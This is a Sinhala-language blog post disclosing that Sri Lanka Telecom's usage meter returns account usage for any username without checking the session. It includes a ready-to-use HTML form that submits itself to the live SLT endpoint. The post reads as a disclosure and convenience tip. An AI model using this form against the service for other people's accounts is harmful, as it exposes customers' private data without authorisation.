SLT Usage Meter එක හැක් කරළද?

Is SLT Usage Meter Hacked?




මේදවස් වල හැම තැනම softwere කෑල්ලක් යනව SLT Usage Meter එක හැක් කලා කියලා.
ඇත්තටම එහෙම කරළද?
එක මේ Meter එක හදද්දි ඉතුරුවෙච්ච පුංචි හිලක්.
අපි පොඩි POST requests යැව්වහම මේ ගොයියා විස්තර ඔක්කොම පෙන්වනවා SESSION එක check කරන්නේ නෑ
ඒ කියන්නේ password ඕනෙ නෑ...

ඉක්මනට මේ හිල වහයි කියලා බලාපොරොත්තු වෙනවා.
හැබැයි ඉතින් වෙන කාහෙවත් Usage බලල මොනව කරන්නද?


භාවිතා මාපකය / Usage Meter

සේවාව / Service

පරිශීලක නාමය / User Name
මාසය 1 / Month 1
මාසය 2 / Month 2
මාසය 3 / Month 3
දිනය / Date
 "N" කියල තියෙන්නේ අද දිනේට හරියන විදිහට පෙන්නන්න කියලා system එකට කියන්න.
වෙනස් කරනවනම් month format එක ේං : OCT/2012

හැම තිස්සෙම මේපැත්තේ එන එක කරදරයි වගේ නම්, මේ පහලතියෙන code එක copy කරගන්න. ඊට පස්සේ notepad වගේ text editor එකක් open කරලා code එක paste කරලා, රතු පාටින් තියෙන "xx0000000" වෙනුවට ඔයාගේ User Name එක දාලා html document එකක් විදිහට save කරගන්න. ඒ කියන්නේ web browser එකකින් open කරන්න පුළුවන් file එකක් විදිහට. file එකේ extension එක .html උනානම් හරි.

<html>
<head>
<title>SLT Usage Meter</title>
</head>
<body>
<form name="myForm" id="myForm" action="http://webusage.slt.lk:8080/servlet/BmsWeb" method="POST">
<select name="service">
<option value="SLTBB">BROADBAND</option>
<option value="ROAM">ROAM</option>
<option value="WIFI">WIFI</option>
<option value="ISDN">ISDN</option>
<option value="PSTN">PSTN</option>
<option value="CDMA">CDMA</option>
</select>
<input name="userName" type="text" value="xx0000000">
<input name="mon1" type="text" value="N">
<input name="mon2" type="text" value="N">
<input name="mon3" type="text" value="N">
<input name="mon4" type="text" value="N">
<input name="I1" type="submit" value="submit">
</form>
<script type="text/javascript">
document.forms["myForm"].submit();
</script>
</body>
</html>
Related Posts with Thumbnails